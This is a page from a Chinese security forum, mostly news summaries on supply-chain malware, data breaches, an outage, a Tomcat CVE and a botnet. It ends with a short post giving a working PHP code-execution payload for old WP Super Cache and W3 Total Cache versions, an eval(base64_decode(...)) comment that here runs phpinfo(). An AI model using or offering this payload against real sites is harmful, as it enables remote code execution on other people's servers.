恶意 NuGet 包攻击 ASP.NET 开发人员以窃取登录凭据
针对 ASP.NET 开发人员的供应链攻击已经出现,该攻击涉及四个恶意 NuGet 包,旨在窃取登录凭据并在 Web 应用程序中植入持久后门。这些软件包——NCryptYo、DOMOAuth2_、IRAOAuth2.0 和 SimpleWriter_——由用户名为“hamzazaheer”的威胁行为者于 2024 年 8 月 12 日至 21 日期间发布,它们累计下载量已超过 4,500 次。攻击 ...
Anthropic称中国AI公司利用1600万次Claude查询复制模型
Anthropic周一表示,它发现了由三家人工智能(AI)公司DeepSeek、Moonshot AI和MiniMax发起的"工业级规模"行动,这些公司非法提取Claude的能力以改进自己的模型。 这些蒸馏攻击通过约24,000个欺诈账户生成了超过1600万次与其大语言模型(LLM)的交互,违反了其服务条款和地区访问限制。这三家公司均位于中国,由于"法律、监管 ...
Conduent 数据泄露事件——美国历史上最大规模数据泄露,勒索软件组织窃取 8TB 数据
Conduent 数据泄露通知信已发送给数百万用户,勒索软件组织声称在美国最大的数据泄露事件之一中窃取了 8 TB 的数据。本月开始,受影响的个人陆续收到信件,信中详细介绍了 Conduent Business Services, LLC 发生的一起重大数据泄露事件。Conduent Business Services, LLC 是一家政府技术承包商,为全国各地的客户处理付款、 ...
Cloudflare 宕机——长达 6 小时的全球大规模服务中断导致客户无法访问互联网
2026 年 2 月 20 日,Cloudflare 遭遇了长达 6 小时的全球服务中断,导致使用其自带 IP (BYOIP) 服务的客户受到严重影响。该事件始于世界协调时 17:48,持续了 6 小时 7 分钟,无意中从互联网上撤回了客户的 BGP 路由,导致许多服务和应用程序无法访问。该公司证实,此次中断完全是由内部配置更新引起的,而非网络攻击或恶 ...
Apache Tomcat 漏洞允许攻击者通过 HTTP/0.9 请求绕过安全限制
Apache Tomcat 已披露 CVE-2026-24733,这是一个低危安全约束绕过漏洞,当某些访问控制规则以特定方式配置时,可通过 HTTP/0.9 请求触发该漏洞。Apache Tomcat 安全团队发现了该问题,最初的安全公告于 2026 年 2 月 17 日发布。从根本上讲,该漏洞源于 Tomcat 没有将 HTTP/0.9 请求限制为 GET 方法。HTTP/0.9 是一种过时的 ...
与俄罗斯关联的“Prometei”僵尸网络恢复针对Windows服务器的远程访问攻击
据《网络安全新闻》等外国媒体报道,该僵尸网络通过细致挖掘远程桌面协议(RDP)的弱密码或初始设置来渗透系统。渗透后,它执行一个两阶段部署命令,结合命令提示符(MCD)和PowerShell,完全控制系统权限。该僵尸网络还注册为名为“UPlugPlay”的Windows服务,试图通过设置防火墙异常或排除杀毒处理来隐藏其行为。其特点是 ...
为什么没人发这个?Wordpress W3 Total Cache PHP Code Execution
针对以下两个插件都有效WP Super Cache (version 1.2 and below, version 1.3.x and up are OK)W3 Total Cache (version 0.9.2.8 and below, version 0.9.2.9 is OK)在任意帖子处评论[code]<!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc-->[/code]就执行了php,phpinfo();
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。当前正在使用CDN加速。
Copyright © 2008 - 2026 T00ls All Rights Reserved.